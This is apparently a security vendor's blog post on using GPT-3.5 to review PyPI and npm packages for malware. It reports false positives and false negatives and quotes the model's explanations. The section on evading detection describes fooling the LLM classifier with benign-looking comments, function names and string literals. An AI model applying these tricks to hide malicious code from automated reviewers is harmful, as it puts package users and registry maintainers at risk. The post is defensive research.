LLM-assisted Malware Review: AI and Humans Join Forces to Combat Malware

Experiments with GPT-3.5 suggest that LLM-based malware reviews can complement, but not yet substitute human reviews. 1800 binary classifications performed with GPT-3.5 included false-positives and false-negatives.

Henrik Plate
Henrik Plate

TL;DR - Experiments with GPT-3.5 suggest that LLM-based malware reviews can complement, but not yet substitute human reviews. 1800 binary classifications performed with GPT-3.5 included false-positives and false-negatives. Moreover, it turned out that the classification can be fooled with simple tricks. But pre-processing of code snippets, additional effort on prompt engineering and future models are expected to improve those results.

The number of malicious packages published on PyPI, npm and other package repositories keeps on increasing, and we do not think this phenomenon is going to disappear any time soon: The creation of fake accounts and the publication of malicious packages can be automated to a great extent such that the marginal costs of creating and releasing a malicious package come close to zero.

At Endor Labs, we started a few months back to join the community’s efforts in identifying malicious packages. To this end, we employ a mixture of different AI techniques that look at features of the packages’ source code and metadata. The source code, for example, is searched for the presence of typical malware behavior, e.g., droppers, reverse shells or information exfiltration.

As for every other classification task, it is desirable to minimize both the number of false-positives (packages wrongly classified as malicious) and false-negatives (packages wrongly classified as benign). However, minimizing one often comes at the expense of increasing the other, which requires finding the right balance, depending on the specific use-case at hand. Common questions in this context concern the security risks implied through false-negatives on one side and the availability of resources (and their willingness) to deal with false-positives on the other.

And this is where large language models (LLMs) such as GPT-3.5 or GPT-4 come into the picture: They are not only able to generate source code in a large variety of programming languages, including various kinds of malware, but also show impressive results in regards to explaining source code. Maybe their capability to automatically assess large numbers of malware candidates permits using more noisy detection techniques and increasing recall?

In the following example, ChatGPT is able to decode a naïvely obfuscated URL and correctly summarizes the snippet’s behavior as potentially malicious.

Encouraged by such examples, we decided to evaluate whether and how to include an LLM-assisted review step in our malware analysis pipeline, and this blog post reports on those experiments.

Experimental setup

The experimental pipeline monitors PyPI and npm. For every newly published artifact, it starts collecting dozens of signals from the respective source code, e.g., the presence of suspicious string literals or the use and combination of certain APIs. The collection of those signals is based on the review of malware samples used in past attacks, such as the ones contained in the Backstabber’s Knife Collection.

In case of npm, every newly published package comes with exactly one artifact, while PyPI packages can have multiple source and binary artifacts, e.g., wheels and source tarballs, each one of which is analyzed separately.

Note that we decided to re-include signals in the pipeline that were considered too noisy in the past, i.e. which produced too many false-positives. A good example for such a noisy feature is the start of operating system processes with string literals that contain specific sensitive commands such as “curl” or “bash”: While they have been used numerous times to download and execute 2nd stage malware, they are also commonly used for non-malicious tasks.

Finally, rather than using home-made models to predict maliciousness, the pipeline’s last step makes a call to api.openai.com and asks for a classification of all the code snippets collected beforehand (until there are no more code snippets for a given artifact or the artifact has been classified as malicious). To this end, we use the model gpt-3.5-turbo with default temperature, and ask for a binary classification.

Preliminary Results

Over a period of several days, GPT-3.5 was queried for 1874 artifacts, whereby code snippets of 34 artifacts (from 29 distinct packages) were classified as malicious.

  • 13 of those artifacts (from 9 distinct packages) were true-positive findings, thus, contained malware.

    Artifacts of the following 5 packages were still present in the respective registry at the time of our manual review. We informed the registry administrators accordingly, who removed them within a few hours after our report.
  • Promptcolor 0.1.0 (PyPI)
  • Libcrypt 1.2.0 (PyPI)
  • Colorizepip 1.0.0 (PyPI)
  • Readycharz 0.2.0 (PyPI)
  • Bleeding-edge-css 1.2.2 and 2.2.2 (npm)
  • 1 artifact is a proof-of-concept that downloads and opens an image via npm install hook.
  • 5 other artifacts (from 4 distinct packages) contain obfuscated code, which, according to our analysis, did not expose any malicious behavior.
  • 15 artifacts (from 14 distinct packages) were false-positive findings, thus, wrongly classified by GPT-3.5 as malicious.

Considering that the use of obfuscated code in packages distributed on npm and PyPI is often used in conjunction with malicious behavior, thus, requires a deeper review, we lean towards saying that GPT-3.5 correctly assessed 19 out of the 34 artifacts.

The false-positives are predominantly due to incomplete and syntactically incorrect code snippets, which commonly happens if the prompt’s length restriction prevents us from uploading an entire file.

In the case of the PyPI package “cikuu”, for example, GPT-3.5 concluded that the “code appears to be incomplete and stops abruptly in the middle of writing the code for the `save_ssi` function. As such, it will not execute properly and will not cause any harm. However, if the missing code contains any malicious intent, it cannot be determined without the complete source code. Therefore, it is strongly recommended to not use or execute this code until it can be verified that the entire code is safe and functional”.

In regards to false-negatives, it is interesting to highlight some examples found during spot checks.

The Python file steam.py of the malicious package web3toolz 0.8, for instance, exfiltrates information related to the Steam gaming platform. However, even though GPT-3.5 explains the behavior very well, it does not assess this behavior as malicious. 

“The given source code is not malicious. It imports some built-in Python libraries such as os, os.path, zipfile, and requests for file handling and web requests. It also imports the base64 library to decode the response from the web request. Firstly, it decodes the response from "https://mehmetaliii.pythonanywhere.com/webzuhurt" using base64.b64decode() and assigns it to the 'hook' variable. This decoded value represents a URL that is used to send a POST request later.

After that, the script checks the existence of the 'steam' directory in the Program Files directory. If it is present then it finds all files starting with \"ssfn\" along with the 'config' file from the steam directory. Then it writes all these files to a zipped file 'steam_session.zip' located in the temporary directory using the zipfile library. Finally, it sends a POST request to the URL at 'hook' with the 'steam_session.zip' file as a payload.

So, this script seems to prepare a file containing Steam configurations and SSFN files (used for Steam guard authentication) and sends it to a specific URL. The impact of the code execution depends on the hosted URL's intent and can not be determined by this script.”

Again, we reported this package and it has been promptly removed by the PyPI administrators.

Another example is the Python file python.payload.py of the pentesting tool PhoenixC2 1.0. Again, GPT-3.5 correctly describes a reverse shell and other suspicious behavior, however, it does not flag it as potentially malicious:

“The Python code in "python.payload.py" seems to be benign. It establishes a connection with the server and waits for commands from the server. Based on the received commands, it either executes system shell commands, sends/receives files to/from the server, starts reverse-shell or executes modules. None of these actions seem to be malicious in isolation.

However, the impact of the code execution depends on the commands received from the server. If any of the commands executed are malicious, then the impact of the code execution can be classified as malicious as well.”

Interestingly, GPT-4 comes to a different conclusion (with which we agree):

Simple tricks to evade detection

In addition to the experiment above, we also investigated the possibility to trick GPT into wrong assessments.

And this is when the initial excitement about GPT-3.5 changed to a more sober and realistic view of its current capabilities: As it turned out, GPT can be tricked with help of several simple techniques to change an assessment from malicious to benign, e.g., by using innocent function names, including comments that indicate benign functionality or through inclusion of string literals.

In this example, GPT-3.5 “believed” the comment and suggested that the code “seems to be benign since it only downloads additional code and executes it, but doesn't seem to contain any malicious functionality”.

But once you take a step back, this does not come as a big surprise either: After all, LLMs have been trained on large corpora of text in order to predict characters, words and sentences based on probabilistic models. Intuitively, the addition of content suggesting benign behavior alters the probability that it is indeed doing something useful…

Also note that it was not easily possible to modify the initial instructions provided in the prompt such that GPT-3.5 ignores comments or function names when “interpreting” the source code snippet.

Going forward, it will be interesting to evaluate the effect of pre-processing source code snippets prior to being included in the prompt, e.g., to replace identifiers and remove comments altogether. This, however, will certainly impact the model’s capability to explain the source code, which is to a great extent based on interpreting program code as text and using human-provided identifiers and comments as input. Moreover, the use of generic identifiers could also be “interpreted” as obfuscation and as such negatively influence the assessment.


The experiments described in this blog post suggest that LLM-assisted malware reviews with GPT-3.5 are not yet a viable alternative to manual reviews.

One inherent problem seems to be the reliance on identifiers and comments to “understand” code behavior. They are a valuable source of information for code developed by benign developers, but they can also be easily misused by adversaries to evade the detection of malicious behavior.

But even though LLM-based assessment should not be used instead of manual reviews, they can certainly be used as one additional signal and input for manual reviews. In particular, they can be useful to automatically review larger numbers of malware signals produced by noisy detectors (which otherwise risk being ignored entirely in case of limited review capabilities).